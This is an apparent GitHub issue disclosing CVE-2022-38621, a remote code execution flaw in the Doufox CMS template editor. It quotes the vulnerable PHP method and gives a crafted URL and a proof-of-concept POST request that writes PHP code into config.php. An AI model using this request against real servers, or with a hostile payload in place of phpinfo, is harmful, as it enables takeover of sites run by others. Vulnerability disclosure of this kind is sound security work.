Headline
CVE-2022-38621: Doufox edit file hava a RCE Vulnerability · Issue #7 · Doufox/Doufox
Doufox v0.0.4 was discovered to contain a remote code execution (RCE) vulnerability via the edit file page. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.
Vulnerability file:
core\controllers\admin\TemplateController.php
public function editAction()
{
$theme = $this\->get('theme') ? urldecode($this\->get('theme')) : '';
if (!file\_exists(THEME\_PATH . DS . $theme)) {
$this\->show\_message('该模板不存在!', 2, url('admin/template'));
}
$filename = urldecode($this\->get('file'));
$dir = $this\->get('dir') ? urldecode($this\->get('dir')) : '/';
$dir = str\_replace(DS . DS, DS, $dir);
$filepath = THEME\_PATH . DS . $theme . $dir . $filename;
$cur\_path = DS . THEME\_DIR. DS . $theme . $dir . $filename;
if (!is\_file($filepath)) {
$this\->show\_message($cur\_path . '该文件不存在!', 2, url('admin/template/item', array('dir' => $dir)));
}
if ($this\->isPostForm()) {
file\_put\_contents($filepath, stripslashes($\_POST\['file\_content'\]), LOCK\_EX);
$this\->show\_message('提交成功', 1);
}
if (urldecode(dirname($dir)) == '.') {
$top\_url = url('admin/template/item', array('theme' => $theme));
} else {
$top\_url = url('admin/template/item', array('theme' => $theme, 'dir' => urldecode($dir . DS)));
}
$filecontent = htmlspecialchars(file\_get\_contents($filepath));
include $this\->views('admin/template/add');
}
Although the edit file page does not have an edit button for the PHP file, we can edit the config.php file by constructing a URL
http://ip:port/index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php
POC
POST /index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php HTTP/1.1
Host: ip:port
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=86s25d8kqaptrner2r2iqrqrv7;
Connection: close
file_content=<?php+phpinfo();?>&submit=%E6%8F%90%E4%BA%A4